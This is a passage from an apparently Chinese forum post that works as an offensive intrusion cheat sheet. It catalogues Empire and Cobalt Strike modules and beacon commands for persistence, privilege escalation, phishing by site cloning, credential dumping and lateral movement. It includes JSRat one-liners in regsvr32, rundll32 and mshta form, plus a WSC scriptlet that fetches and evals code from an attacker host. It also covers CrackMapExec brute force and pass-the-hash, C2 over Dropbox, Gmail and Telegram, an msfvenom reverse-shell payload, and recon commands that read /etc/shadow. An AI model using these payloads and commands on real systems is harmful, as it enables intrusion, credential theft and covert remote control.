persistence/misc/skeleton_key* 运行PowerSploit的Invoke-Mimikatz函数来执行misc::skeleton,植入密码mimikatz的万能钥匙。 仅适用于域控制器
persistence/powerbreach/deaduser DeadUserBackdoor后门,详细信息:http://www.sixdub.net/?p=535
persistence/powerbreach/eventlog* 启动事件循环后门
persistence/powerbreach/resolver 启动解析器后门
persistence/userland/backdoor_lnk LNK文件后门
persistence/userland/registry 计算机启动项持久化,通过HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run进行持久化,运行一个stager或者脚本
persistence/userland/schtasks 计划任务持久化

Privesc(权限提升)

模块名 功能
privesc/ask 弹出一个对话框,询问用户是否要以管理员身份运行powershell
privesc/bypassuac UAC bypass
privesc/bypassuac_env UAC bypass
privesc/bypassuac_eventvwr UAC bypass
privesc/bypassuac_fodhelper UAC bypass
privesc/bypassuac_sdctlbypass UAC bypass
privesc/bypassuac_tokenmanipulation UAC bypass
privesc/bypassuac_wscript UAC bypass
privesc/getsystem* 获取system特权
privesc/gpp 利用windows组策略首选项缺陷获取系统帐号
privesc/mcafee_sitelist 寻找McAfee SiteList.xml文件的纯文本密码
privesc/ms16-032 MS16-032本地提权
privesc/ms16-135 MS16-135本地提权
privesc/tater 利用PowerShell实现的Hot Potato提权
privesc/powerup/allchecks 检查目标主机的攻击向量以进行权限提升
privesc/powerup/find_dllhijack 查找通用的.DLL劫持
privesc/powerup/service_exe_restore 还原备份的服务二进制文件
privesc/powerup/service_exe_stager 备份服务的二进制文件,并用启动stager.bat的二进制文件替换原始文件
privesc/powerup/service_exe_useradd 修改目标服务以创建本地用户并将其添加到本地管理员
privesc/powerup/service_stager 修改目标服务以执行Empire stager
privesc/powerup/service_useradd 修改目标服务以创建本地用户并将其添加到本地管理员
privesc/powerup/write_dllhijacker 将可劫持的.dll以及.dll调用的stager.bat一起写到指定路径。 wlbsctrl.dll在Windows 7上运行良好。需要重新启动计算机

Recon(侦察)

模块名 功能
recon/find_fruit 在网络范围内搜索潜在的易受攻击的Web服务
recon/get_sql_server_login_default_pw 发现在当前广播域之内的SQL Server实例
recon/http_login 针对基本身份验证测试凭据

Situational_awareness(态势感知)

模块名  
situational_awareness/host/antivirusproduct 获取防病毒产品信息
situational_awareness/host/computerdetails* 枚举有关系统的有用信息
situational_awareness/host/dnsserver 枚举系统使用的DNS服务器
situational_awareness/host/findtrusteddocuments 该模块将枚举适当的注册表
situational_awareness/host/get_pathacl 枚举给定文件路径的ACL
situational_awareness/host/get_proxy 枚举当前用户的代理服务器和WPAD内容
situational_awareness/host/get_uaclevel 枚举UAC级别
situational_awareness/host/monitortcpconnections 监视主机与指定域名或IPv4地址的TCP连接,对于会话劫持和查找与敏感服务进行交互的用户很有用
situational_awareness/host/paranoia* 持续检查运行过程中是否存在可疑用户
situational_awareness/host/winenum 收集有关主机和当前用户上下文的相关信息
situational_awareness/network/arpscan 针对给定范围的IPv4 IP地址执行ARP扫描
situational_awareness/network/bloodhound 执行BloodHound数据收集
situational_awareness/network/get_exploitable_system 查询Active Directory以查找可能容易受到Metasploit Exploit的系统
situational_awareness/network/get_spn 获取服务主体名称(SPN)
situational_awareness/network/get_sql_instance_domain 返回SQL Server实例列表
situational_awareness/network/get_sql_server_info 从目标SQL Server返回基本服务器和用户信息
situational_awareness/network/portscan 使用常规套接字进行简单的端口扫描
situational_awareness/network/reverse_dns 执行给定IPv4 IP范围的DNS反向查找
situational_awareness/network/smbautobrute 针对用户名/密码列表运行SMB暴力破解
situational_awareness/network/smbscanner 在多台机器上测试用户名/密码组合
situational_awareness/network/powerview/find_foreign_group 枚举给定域的组的所有成员,并查找不在查询域中的用户
situational_awareness/network/powerview/find_foreign_user 枚举在其主域之外的组中的用户
situational_awareness/network/powerview/find_gpo_computer_admin 获取计算机(或GPO)对象,并确定哪些用户/组对该对象具有管理访问权限
situational_awareness/network/powerview/find_gpo_location 获取用户名或组名,并确定其具有通过GPO进行管理访问的计算机
situational_awareness/network/powerview/find_localadmin_access 在当前用户具有“本地管理员”访问权限的本地域上查找计算机
situational_awareness/network/powerview/find_managed_security_group 此功能检索域中的所有安全组
situational_awareness/network/powerview/get_cached_rdpconnection 使用远程注册表功能来查询计算机上“ Windows远程桌面连接客户端”的所有信息
situational_awareness/network/powerview/get_computer 查询当前计算机对象的域
situational_awareness/network/powerview/get_dfs_share 返回给定域的所有容错分布式文件系统的列表
situational_awareness/network/powerview/get_domain_controller 返回当前域或指定域的域控制器
situational_awareness/network/powerview/get_domain_policy 返回给定域或域控制器的默认域或DC策略
situational_awareness/network/powerview/get_domain_trust 返回当前域或指定域的所有域信任
situational_awareness/network/powerview/get_fileserver 返回从用户主目录提取的所有文件服务器的列表
situational_awareness/network/powerview/get_forest 返回有关给定域森林的信息
situational_awareness/network/powerview/get_forest_domain 返回给定林的所有域
situational_awareness/network/powerview/get_gpo 获取域中所有当前GPO的列表
situational_awareness/network/powerview/get_group 获取域中所有当前组的列表
situational_awareness/network/powerview/get_group_member 返回给定组的成员
situational_awareness/network/powerview/get_localgroup 返回本地或远程计算机上指定本地组中所有当前用户的列表
situational_awareness/network/powerview/get_loggedon 执行NetWkstaUserEnum Win32API调用以查询主动登录主机的用户
situational_awareness/network/powerview/get_object_acl 返回与特定活动目录对象关联的ACL
situational_awareness/network/powerview/get_ou 获取域中所有当前OU的列表
situational_awareness/network/powerview/get_rdp_session 在给定的RDP远程服务中查询活动会话和原始IP
situational_awareness/network/powerview/get_session 执行NetSessionEnum Win32API调用以查询主机上的活动会话
situational_awareness/network/powerview/get_site 获取域中所有当前站点的列表
situational_awareness/network/powerview/get_subnet 获取域中所有当前子网的列表
situational_awareness/network/powerview/get_user 查询给定用户或指定域中用户的信息
situational_awareness/network/powerview/map_domain_trust 使用.CSV输出映射所有可访问的域信任
situational_awareness/network/powerview/process_hunter 查询远程机器的进程列表
situational_awareness/network/powerview/set_ad_object 使用SID,名称或SamAccountName来查询指定的域对象
situational_awareness/network/powerview/share_finder 在域中的计算机上查找共享
situational_awareness/network/powerview/user_hunter 查找指定组的用户登录的机器

Trollsploit(恶作剧)

模块名 功能
trollsploit/get_schwifty 播放Schwifty视频,同时把计算机音量设置最大
trollsploit/message 发送一个消息框
trollsploit/process_killer 终止以特定名称开头的任何进程
trollsploit/rick_ascii 生成一个新的powershell.exe进程运行Lee Holmes' ASCII Rick Roll
trollsploit/rick_astley 运行SadProcessor's beeping rickroll
trollsploit/thunderstruck 播放Thunderstruck视频,同时把计算机音量设置最大
trollsploit/voicetroll 通过目标上的合成语音朗读文本
trollsploit/wallpaper 将.jpg图片上传到目标机器并将其设置为桌面壁纸
trollsploit/wlmdr 在任务栏中显示气球提示

Empire Word

>usestager windows/launcher_bat生成bat木马,设置Listener
Word/Excel->插入->对象->由文件创建,选择bat,显示为图标,修改图标
Macro
>usestager windows/macro 设置Listener
Word/Excel->试图->宏->创建,复制macro进去

Empire派生Cobalt Strike和MSF

派生MSF
可绕过杀软
Empire
>usemodule code_execution/invoke_shellcode
>set Lhost 192.168.0.1
>set Lport 4444
>set Payload reverse_http
MSF
>use exploit/multi/handler
>set payloadwindows/meterpreter/reverse_http
>set Lhost 192.168.31.247
>set lport 4444
>run
或Empire
>usemodule code_execution/invoke_metasploitpayload
>set URL http://SRVHOST:SRVPORT
MSF
#use exploit/multi/script/web_delivery
#set payload windows/x64/meterpreter/reverse_tcp
设置SRVHOST SRVPORT
派生Cobalt Strike
创建监听器/windows/beacon_http/reverse_http 设置端口和主机
Empire
>usemodule code_execution/invoke_shellcode
>set Lhost 192.168.0.1
>set Lport 4444
>set Payload reverse_http

Cobalt Strike

安装

需要JDK环境
>tar -xzvf jdk-8u191-linux-x64.tar.gz

部署TeamServer

>./teamserver 192.168.0.107 123456
格式是外网IP和密码

模块

New Connection:新建连接
Preferences:设置外观
Visualization:查看主机的不同形式
VPN Interfaces: VPN接口
Listeners:监听器
Script Interfaces:查看和加载CNA脚本
Close:关闭CS

连接

image

监听器

创建
Cobalt Strike -> Listeners点击Add

image

Beacon为CS内部监听器。
Foreign一般与MSF结合使用。
系统架构的支持

image

攻击模块

image

名称 功能
HTML Application 基于powershell的.hta格式的HTML Application木马,分为可执行文件、PowerShell、VBA三种方法
MS Office Macro office宏病毒文件
Payload Generator 基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、Ruby、VBA等语言的payload
USB/CD AutoPlay 利用USB/CD自动播放运行的木马
Windows Dropper 捆绑器
Windows Executable 生成32位或64位的exe和基于服务的可执行文件、DLL等后门
Windows Executable(S) 生成可执行文件,支持powershell脚本,提供代理功能
Web Drive-by基于WEB的攻击模块
名称 功能
Manage 管理开启的模块
Clone Site 克隆网站
Host File 提供文件下载
Scripted Web Delivery 基于Web的攻击Payload
Signed Applet Attack 运行java自签名的攻击模块
Smart Applet Attack 自动检测Java版本并利用已知的exploits攻击
System Profiler 信息探测模块

视图模块

Applications 显示靶机应用信息
Credentials 显示密码(hashdump和mimikatz获取的)
Downloads 下载文件
Event Log 事件日志
Keystrokes 键盘记录
Proxy Pivots 代理信息
Screenshots 屏幕截图
Script Console 加载脚本
Targets 查看目标
Web Log 查看web日志
创建powershell脚本

image image

复制脚本到目标机执行即可上线.

image

交互

右键目标机Interact进入交互模式
Access	
Dump hashes	获取密码
Elevate	提权
Golden Ticket	黄金票据注入会话
Make token	制作令牌
Run Mimikatz	运行mimikatz
Spawn As	以靶机其他用户权限生成会话
Explore	
Browser Pivot	劫持浏览器
Desktop(VNC)	远程VNC
File Browser	文件管理
Net View	执行命令net view
Port scan	端口扫描
Process list	进程列表
Screenshot	截图
Pivoting		
SOCKS Server	代理
Listener	已获权限的机器当作监听器(反向端口转发)
Deploy VPN	部署VPN
Spawn	
派生会话:联动MSF或Armitage	
右键执行mimikatz即可获取hash及明文密码

image

视图->凭证信息列出密码,类似empire的creds命令

image

Beacon

argue                     进程参数欺骗
blockdlls                  阻止子进程加载非Microsoft DLL
browserpivot              注入受害者浏览器进程
bypassuac                绕过UAC提升权限
cancel                    取消正在进行的下载
cd                        切换目录
checkin                   强制让被控端回连一次
clear                     清除beacon内部的任务队列
connect                   Connect to a Beacon peer over TCP
covertvpn                 部署Covert VPN客户端
cp                        复制文件
dcsync                    从DC中提取密码哈希
desktop                   远程桌面(VNC)
dllinject                   反射DLL注入进程
dllload                    使用LoadLibrary将DLL加载到进程中
download                 下载文件
downloads                列出正在进行的文件下载
drives                     列出目标盘符
elevate                    使用exp
execute                   在目标上执行程序(无输出)
execute-assembly         在目标上内存中执行本地.NET程序
exit                       终止beacon会话
getprivs                   Enable system privileges on current token
getsystem                 尝试获取SYSTEM权限
getuid                     获取用户ID
hashdump                  转储密码哈希值
help                       帮助
inject                      在注入进程生成会话
jobkill                     结束一个后台任务
jobs                       列出后台任务
kerberos_ccache_use       从ccache文件中导入票据应用于此会话
kerberos_ticket_purge     清除当前会话的票据
kerberos_ticket_use       Apply 从ticket文件中导入票据应用于此会话
keylogger                 键盘记录
kill                      结束进程
link                      Connect to a Beacon peer over a named pipe
logonpasswords            使用mimikatz转储凭据和哈希值
ls                        列出文件
make_token                创建令牌以传递凭据
mimikatz                  运行mimikatz
mkdir                     创建一个目录
mode dns                  使用DNS A作为通信通道(仅限DNS beacon)
mode dns-txt              使用DNS TXT作为通信通道(仅限D beacon)
mode dns6                 使用DNS AAAA作为通信通道(仅限DNS beacon)
mode http                 使用HTTP作为通信通道
mv                        移动文件
net                       net命令
note                      备注       
portscan                  进行端口扫描
powerpick                 通过Unmanaged PowerShell执行命令
powershell                通过powershell.exe执行命令
powershell-import         导入powershell脚本
ppid                      Set parent PID for spawned post-ex jobs
ps                        显示进程列表
psexec                    Use a service to spawn a session on a host
psexec_psh                Use PowerShell to spawn a session on a host
psinject                  在特定进程中执行PowerShell命令
pth                       使用Mimikatz进行传递哈希
pwd                       当前目录位置
reg                       Query the registry
rev2self                  恢复原始令牌
rm                        删除文件或文件夹
rportfwd                  端口转发
run                       在目标上执行程序(返回输出)
runas                     以其他用户权限执行程序
runasadmin                在高权限下执行程序
runu                      Execute a program under another PID
screenshot                屏幕截图
setenv                    设置环境变量
shell                     执行cmd命令
shinject                  将shellcode注入进程
shspawn                   启动一个进程并将shellcode注入其中
sleep                     设置睡眠延迟时间
socks                     启动SOCKS4代理
socks stop                停止SOCKS4
spawn                     Spawn a session 
spawnas                   Spawn a session as another user
spawnto                   Set executable to spawn processes into
spawnu                    Spawn a session under another PID
ssh                       使用ssh连接远程主机
ssh-key                   使用密钥连接远程主机
steal_token               从进程中窃取令牌
timestomp                 将一个文件的时间戳应用到另一个文件
unlink                    Disconnect from parent Beacon
upload                    上传文件
wdigest                   使用mimikatz转储明文凭据
winrm                     使用WinRM横向渗透
wmi                       使用WMI横向渗透
执行命令,在beacon模式下键入shell+命令

image

>sleep 0 交互模式,立刻执行命令
注入DLL到某个进程
>dllload [pid] [c:\path\to\file.dll] DLL需在目标上
>kerberos_ticket_purge 清除票据
>kerberos_ccache_use	[/path/to/file.ccache]  从ccache文件导入票据
>kerberos_ticket_use [/path/to/file.ccache] 从ticket文件导入票据
>kill pid 结束进程
>timestomp [fileA]	[fileB] 修改文件时间戳
>getuid	 获取当前用户
>steal_token [pid] 窃取进程ID
>rev2self 恢复原始令牌
>powershell-import	[/path/to/local/script.ps1] 导入PS模块 
>shinject [pid] <x86|x64> [/path/to/my.bin] 向进程注入shellcode
>socks	port在指定端口开启代理
>socks stop停止代理
>rportfwd [bind port]	[forward host]	[forward port]开启端口转发

克隆网站

Attacks -> Web Drive-by -> System Profiler
Redirect url设置为目标站,登录成功会挑战到真实网站
钓鱼攻击->克隆网站
克隆地址写入要克隆的网站
Attack选择刚刚收集信息的网站
Web日志界面可记录键盘

image

攻击->钓鱼攻击管理->web服务管理中,可kill掉刚刚的任务

image

office宏

image image image

钓鱼邮件

新克隆一个网站

image

Embed URL选择克隆好的网站

image image image

里面的超链接已经被Embed URL克隆好的URL替换掉了

image image

若是要加载附件,需注意附件的免杀

加载脚本

https://github.com/rsmudge/ElevateKit 提权脚本
>git clone https://github.com/rsmudge/ElevateKit.git
>git clone https://github.com/TheKingOfDuck/myScripts.git
Cobalt Strike -> Scripts 选择elevate.cna加载
提权的EXP列表就会增加已经加入的模块

浏览器劫持

beacon 设为交互模式
beacon> sleep 0
[Beacon] → Explore → Browser Pivot
选择打对勾的注入,会返回一个proxy,服务器IP+端口
>chromium --no-sandbox --ignore-certificate-errors --proxy-server=服务器IP:端口
访问网址

权限维持

https://github.com/DeEpinGh0st/Erebus
加载 cna 脚本
Cobalt Strike → Script Manager → Load → Erebus 中的 Main.cna
生成 Payload
Attacks → Packages→ Windows Executable(S)
Erebus → Persistence选择维持方法

横向

扫描存活主机
>portscan ip/网段 ports端口 扫描协议(arp、icmp、none) 线程
>portscan 192.168.1.0/24 445 arp 100
或右键目标>扫描
点击工具栏的View–>Targets,查看端口探测后的存活主机。(Targets可自行添加)
Login->psexec进行hash传递登录

隔离网络

权限机中转
Pivoting ->Listener新建一条已有权限机器的监听器

image image image

选择 Attacks->Packages->Windows Executable(Stageless) 

image

上传生成的payload到已上线的目标机中,上传PsExec.exe
beacon>shell C:\psexec.exe -accepteula \\10.1.1.105 -u administrator -p xxx -d -c C:\beacon.exe

image

SMB_beacon
新建监听器(bind)windows/beacon_smb/bind_pipe
执行
>psexec 机器名 ADMIN$/c$ bind
SSH login
>ssh 10.1.1.98:22 root admin

image

代理

>socks 690
视图->代理信息-tunnel 直接复制,粘贴到MSF中

部署VPN

image

选择内网网卡

image image image

添加

image image image

删除

image

Cobalt strike派生 Empire和MSF

派生Empire
创建一个Listener
创建一个stager
>usestager windows/shellcode 执行,会生成/tmp/launcher.bin
CS 使用PS命令查找进程,进行进程注入(>shinject 进程id x64),选择launcher.bin即可
派生MSF
使用CS的外部监听器
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
msf开启监听
cobalt strike会话主机上点击spwan,创建外部监听器,选择windows/foreign/reverse_tcp指定MSF监听的IP和端口即可

JSRat

https://github.com/Hood3dRob1n/JSRat-Py
https://github.com/Ridter/MyJSRat
启动
>python JSRat.py -i 192.168.0.107 -p 1234
MyJSRat可以-c参数指定执行的命令

image

/connect是回连地址,/wtf是执行代码

image

直接在靶机执行

image

或
>regsvr32.exe /u /n /s /i:http://192.168.0.107:1234/file.sct scrobj.dll
JSRat显示上线

image image

Wsc方式
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
        rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://192.168.0.107:1234/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
        new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</component>
</package>
>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.0.107/jsrat.wsc")
Mshta方式
>mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:1234/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

CrackMapExec

信息收集

返回活动主机
>crackmapexec smb 192.168.0.0/24

image

爆破

支持协议ssh,smb,winrm,mssql,http
爆破smb协议,两台机器,一个用户名多个密码
>crackmapexec smb 192.168.0.98 192.168.0.55 -u username1 -p password1 password2
>crackmapexec smb 192.168.0.0/24 -d zone.com -u y -p 'password' --shares

image

密码喷射
>crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
指定字典
>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -p /tmp/pass.txt
Hash爆破
>crackmapexec <protocol> <target(s)> -u /tmp/user.txt -H /tmp/ntlm.txt

可用模块

日志的保存位置
~/.cme/logs
查看协议可用后续模块
>crackmapexec smb -L

image

常用的模块
Get-ComputerDetails获取计算机信息
Bloodhound 执行一个BloodHound脚本获取信息
empire_exec 与empire交互
enum_avproducts 列举AV产品
enum_chrome 获取目标chrome中保存的密码
get_keystrokes 键盘记录
get_netdomaincontroller 列出所有域控制器
get_netrdpsession 列出活动的RDP会话
gpp_autologin 从域控中registry.xml查找自动登录的账户密码
gpp_password 组策略凭据中返回GPP密码
invoke_sessiongopher 保存putty,winscp,filezilla,superputty rdp的session
invoke_vnc 注入一个vnc客户端到内存
met_inject 与msf交互
mimikatz 调用mimikatz模块
mimikatz_enum_chrome 使用mimikatz解密chrome保存的密码
mimikatz_enum_vault_creds 解密windows凭据管理器中保存的密码
mimikittenz 执行咪咪猫(windows密码获取软件)
multirdp 允许多用户登录RDP
netripper 通过API hooking截取平常
pe_inject DLL/EXE注入
rdp 开启或关闭RDP
shellcode_inject 注入shellcode
tokens 列举可用token
uac 查看UAC是否开启
wdigest 开启或关闭wdigest
web_delivery 执行exploit/multi/script/web_delivery模块
查看模块的选项
>crackmapexec smb -M module --options

image

使用方式
>crackmapexec smb <target(s)> -u user -p 'P@ssw0rd' -M module -o 参数=值

image

PTH

>crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
>crackmapexec smb <target(s)> -u username -H NTHASH

执行命令

>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -x 'command'

image

-X执行powershell命令
>crackmapexec smb 192.168.0.98 -u y -p 'qwe12323' -X 'POWESHELL'

koadic

https://github.com/zerosum0x0/koadic
>git clone https://github.com/zerosum0x0/koadic.git
>cd koadic
>pip3 install -r requirements.txt
>./koadic

SILENTTRINITY

https://github.com/byt3bl33d3r/SILENTTRINITY
类似cobalt strike+empire的结合
>git clone https://github.com/byt3bl33d3r/SILENTTRINITY
>pip3 install --user pipenv && pipenv install && pipenv shell
>python st.py
服务端执行
>python3 st.py teamserver <teamserver_ip> <teamserver_password>
>python3 st.py teamserver 192.168.0.108 123456
也可加参数--port指定端口

image

客户端执行
>python3 st.py client wss://<username>:<teamserver_password>@<teamserver_ip>:5000
>python3 st.py client wss://y:123456@192.168.0.108:5000

image

>listeners命令进入监听器目录
>use http选择监听器
>options命令查看需要配置的参数

image

>set Port 8081 使用set命令配置参数
>start 启动监听器
>list查看运行中的监听器

image

>stop http使用stop+监听器名字停止监听器
>stagers进入payload目录
>list列出可用payload

image

>use payloadname 命令use+payload名字
>generate http generate+监听器名字生成payload

image

Browser C2

360全套+火绒没有拦截
缺点:会有黑框,并且打开chrome浏览器,功能限制
https://github.com/0x09AL/Browser-C2
>go get -u github.com/gorilla/mux
>go get -u github.com/chzyer/readline
>git clone https://github.com/0x09AL/Browser-C2.git
/Browser-C2/agent/agent.go修改C2地址

image

修改chrome的位置

image

编译客户端
>CGO_ENABLED=1 GOARCH= GOOS=windows go build

image

 /Browser-C2/static/jquery.js修改控制服务器IP

image

转到主目录编译服务器端
>go build
靶机执行生成好的客户端
攻击机监听

image

此框架与靶机之间通信未加密,功能有限,可与msf、cs、poshc2、empire等框架建立联系。

DropBox C2

>git clone https://github.com/Arno0x/DBC2 dbc2
>cd dbc2
>pip install -r requirements.txt
>chmod +x dropboxC2.py
https://www.dropbox.com/developers/apps/create
创建好后要生成个accesstoken,填入config.py中

image

执行

image

这里需设置一个与受控机交互的加密密码
发布agent
>publishStage dbc2_agent.exe
使用命令listPublishedStage可以看到已发布的agent

image

生成payload
>genStager [tab]查看可生成的格式

image

>genStager oneliner default生成powershell格式payload

image

>genStager batch default生成bat格式

image

Msbuild,其余不做演示

image

这里使用powershell格式的,在受控机运行

image

攻击机可以看到上线

image

>list命令可以看到已控机器

image

使用use命令与受控机器交互

image

输入?获得后续命令

image

Gmail C2

Gcat

https://myaccount.google.com/lesssecureapps
启用设置

image

Gmail启用imap

image

将以下脚本转换为exe
# setup.py
from distutils.core import setup
import py2exe

setup(console=['implant.py'])
https://github.com/byt3bl33d3r/gcat
把gcat项目中的implant.py跟以上脚本放在同一目录,修改implant.py中的账户信息

image

>python 1.py py2exe打包
dist目录下生成implant.exe受控机执行
同时也要修改项目中gcat.py中的账户信息

image

在受控机执行implant.exe,如果报错修改email模块以下三行
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText

image

执行后,邮箱会收到信息

image

使用gcat.py也可以得到当前会话
>python gcat.py -list

image

现在可对其进行控制
>python gcat.py -id [id] -cmd 'net user'

image

生成jobid,指定jobid可查看回显

image

邮箱中也存在

image

当受控机为中文系统时,回显会报错,修改代码

image

其他模块有回显的直接修改后重新py2exe打包即可。
支持的功能:cmd,upload/download,执行shellcode,键盘记录,截屏等

Gdog

https://github.com/maldevel/gdog
功能更多:
加密传输、地理位置、执行命令、上传下载、shellcode、截图、键盘记录、关闭重启、注销用户、从web下载、访问网站等
配置流程基本一样,需要打包exe,但是要安装一些模块PyCrypto、WMI、Enum34、Netifaces
# setup.py
from distutils.core import setup
import py2exe
 
setup(console=['client.py'])
client.py在回显处也要添加decode gbk
执行client.exe报超出索引错误时
在client.py中搜索字符串for iface in netifaces.interfaces():
在它下面一行修改为
if netifaces.ifaddresses(iface)[netifaces.AF_LINK][0]['addr'] == self.MAC and netifaces.AF_INET in netifaces.ifaddresses(iface):
打包好后执行

image image image image

提取jobid回显出错的话,添加
reload(sys)
sys.setdefaultencoding("utf-8")
执行shellcode
>msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python
去除引号加减号,只保留shellcode粘贴到文件shell.txt
>python gdog.py -id {id} -exec-shellcode /tmp/shell.txt

Telegram C2

登录telegram
访问https://telegram.me/botfather,发送消息

image

创建一个bot

image

创建完成后返回一个token
>pip install telepot
>pip install requests
>git clone https://github.com/blazeinfosec/bt2.git
编辑bt2.py
粘贴token和chatid进脚本
Chat_id的获取方式
https://api.telegram.org/bot<token>/getUpdates

image image

当有受控机上线时会列出功能

image image

Windows
https://github.com/sf197/Telegra_Csharp_C2

信息收集

Cmd

>whoami /user 查看当前用户SID
>net config Workstation 查看当前计算机信息
>net time /domain 判断主域
错误5:存在域,当前不是域用户
显示时间:存在域,当前是域内用户
找不到域:不存在
>net view /domain 列出域列表
>net group "Domain Controllers" /domain查看主域控
>nltest /DCLIST:zone.com 查看域控
>net group "domain admins" /domain 查看域管理员
>net group "enterprise admins" /domain 查看企业管理员列表
>net localgroup administrators /domain 查看管理组用户
>net group "domain computers" /domain 查看域成员计算机
>net accounts /domain 查看密码策略
>net user /domain查看域内用户
>net view /domain:dc 查询域内计算机
>netsh firewall set opmode disable/enable 关闭windows防火墙(win2003)
>netsh advfirewall set allprofiles state off/on(大于win2003)
>arp -a查看arp表
>net start 查看服务
>route print查看路由表
>query user查看登录机器的用户的连接状态
>tasklist /v 查看域管理员进程
>dsquery server查询域控制器
>dsquery computer 查询域内机器
>dsquery user 查询域用户
>dsquery ou 域内组织单位
导出域DNS记录,文件保存在C:\Windows\System32\dns\
>dnscmd /zoneexport zone.com 1.txt
导出LDAP数据库
>LDIFDE -f c:\windows\temp\dump.ldf -n -m

Wmi

>wmic OS get Caption,CSDVersion,OSArchitecture,Version系统版本
>wmic service list brief 列出本机服务
>wmic process list brief 列出进程
>wmic process where name="chrome.exe" get executablepath进程路径
>wmic process get caption,commandline /value>>1.txt查询所有进程参数
>wmic process where caption="svchost.exe" get caption,commandline /value 查询某个进程命令行参数
创建进程
>wmic process call create calc
>wmic process call create "C:\shell.exe"
>wmic process call create "shutdown.exe -r -f -t 20"
结束进程
>wmic process where name="shell.exe" call terminate
>wmic process where processid="2345" delete
>wmic process 2345 call terminate
>wmic startup list brief 列出自启动程序
>wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List 查看杀毒软件
>wmic netuse list brief 列出共享驱动盘
>wmic ntdomain list brief 查询域控制器
>wmic useraccount list brief 列出本机管理员及SID
>wmic qfe list brief 列出补丁列表
>wmic share get name,path 查看共享
>wmic startup list brief查看启动项
>wmic product get name,version 查看安装的软件
>wmic product where "name like '%360%'" get name 查看程序名
>wmic product where name="360tray" call uninstall 卸载程序
>wmic process where "name like '%360%'" get name 查找进程全名
>wmic product where name="360tray.exe" call terminate 停止程序
>wmic desktop get screensaversecure,screensavertimeout 查看屏保

PowerView

获取域信息
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Get-NetDomain}"

image

>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; get-netforest}"

image

枚举管理员
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-EnumerateLocalAdmin}"

image

查询管理在线的机器
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-userhunter}"

image

查看域内机器以administrator权限运行的进程
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-processhunter }"

image

或指定参数userfile和computerfile查询某台机器某个用户的进程
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; invoke-processhunter -Userfile .\user.txt -computerfile .\host.txt}"

image

查询域内机器共享
>powershell -exec bypass -Command "&{Import-Module .\powerview.ps1; Invoke-sharefinder}"

image

查询域内机器
>Get-NetComputer -Domain zone.com

image

>Find-LocalAdminAccess -verbose 查询域内本地用户能登录的机器

image

Dev-powerview
获取域控机器和win版本
>Get-DomainController |select name,osversion|fl 

Linux

操作系统&内核版本&环境变量
>cat /etc/issue
>cat /etc/*-release
>cat /etc/lsb-release
>cat /etc/redhat-release
cat /proc/version
>uname -a
>uname -mrs
>rpm -q kernel
>dmesg | grep Linux
>ls /boot | grep vmlinuz-
>cat /etc/profile
>cat /etc/bashrc
>cat ~/.bash_profile
>cat ~/.bashrc
>cat ~/.bash_logout
>env
>set
Root权限进程
>ps aux | grep root
>ps -ef | grep root
计划任务
>crontab -l
>ls -alh /var/spool/cron
>ls -al /etc/ | grep cron
>ls -al /etc/cron*
>cat /etc/cron*
>cat /etc/at.allow
>cat /etc/at.deny
>cat /etc/cron.allow
>cat /etc/cron.deny
>cat /etc/crontab
>cat /etc/anacrontab
>cat /var/spool/cron/crontabs/root
IP信息
>/sbin/ifconfig -a
>cat /etc/network/interfaces
>cat /etc/sysconfig/network
连接信息
>grep 80 /etc/services
>netstat -antup
>netstat -antpx
>netstat -tulpn
>chkconfig --list
>chkconfig --list | grep 3:on
>last
>w
用户信息
>id
>whomi
>w
>last
>cat /etc/passwd
>cat /etc/group
>cat /etc/shadow
>ls -alh /var/mail/
>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # 列出超级用户
>awk -F: '($3 == "0") {print}' /etc/passwd   #列出超级用户
>cat /etc/sudoers
>sudo –l
操作记录
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
可写目录
>find / -writable -type d 2>/dev/null      # 可写目录
>find / -perm -222 -type d 2>/dev/null     # 可写目录 
>find / -perm -o w -type d 2>/dev/null     # 可写目录
>find / -perm -o x -type d 2>/dev/null     # 可执行目录
>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # 可写可执行目录
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

